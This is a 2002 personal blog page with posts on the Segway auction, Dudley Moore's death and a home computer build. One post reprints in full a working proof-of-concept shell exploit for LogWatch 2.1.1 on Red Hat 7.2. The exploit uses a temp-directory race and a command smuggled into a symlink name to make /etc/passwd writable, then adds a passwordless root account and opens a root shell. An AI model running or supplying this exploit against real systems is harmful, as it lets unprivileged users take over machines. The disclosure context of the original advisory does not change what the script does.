Segway Auctions Close
Ok, you remember all that stupid hype about the damn Segway HT, the Human Transporter. Amazon held a auction for the first three units to be release to the public. The Segway is supposed to be sold at a date not so far away at a price of $3000. The three people who won their bids on the Amazon aution paid more than $100,000 each. Just makes me want to say "SUCKERS". It's a scooter people! Not a flying car.

posted by tommEE  # 3/29/2002 01:22:00 PM 0 comments

 

Logwatch is exploitable, watchout root!
While reading bugtraq, I found that Logwatch that comes with the RadHat 7.2 distros and installed by default, is exploitable.LogWatch 2.1.1 is a part of the Red Hat Linux 7.2 distribution, enabled by default and daily run by the cron daemon. On a system running LogWatch, a local user is able to gain unauthorized root access, due to a race condition during the temporary directory creation. See Below:

--- EXPLOIT ---


cat > logwatch211.sh <

#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak



SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/


echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak '
echo
echo "Waiting for LogWatch to be executed"

while :; do
set `ps -o pid -C $SERVANT`
if [ -n "$2" ]; then
mkdir /tmp/logwatch.$2
ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
break;
fi
done
echo "Waiting for LogWatch to finish it's work"
while :; do
set `ps -o pid -C $SERVANT`
if [ -z "$2" ]; then
ls -l /etc/passwd|mail root
echo master::0:0:master:/root:/bin/bash >> /etc/passwd
break;
fi
done
su master

EOF



posted by tommEE  # 3/27/2002 04:41:00 PM 0 comments

 

A man we never got the chance to drink with
Dudley Moore died today at age 66. He died at his home in New Jersey of Pneumonia. Dudley Moor was know for his great drunk acting in Athur in 1981 and I have never stopped of being rich and drunk since that film. I will toast tonight hoping that he has a better round next time.

posted by tommEE  # 3/27/2002 03:02:00 PM 0 comments

 

Random News....
Well I have been kinda lazy this week. El_Jefe has left for Texas so the house is quiet for a while. He should be back in a couple of weeks, not sure if I will get any smarter while it is quiet at the Pickle Pad. I did get new parts for a new computer. I received a AMD Athlon XP 1900+ and a so-so mother board with DDR. It's pretty sweet. I am going to crank it up to a little over 1.6Ghz tonight. Another thing that got my attention today was that we got quite a few hits from FARK.com this week. I don't know what is linked but I found it interesting.

posted by tommEE  # 3/26/2002 07:43:00 PM 0 comments

archives


This page is powered by Blogger. Isn't yours?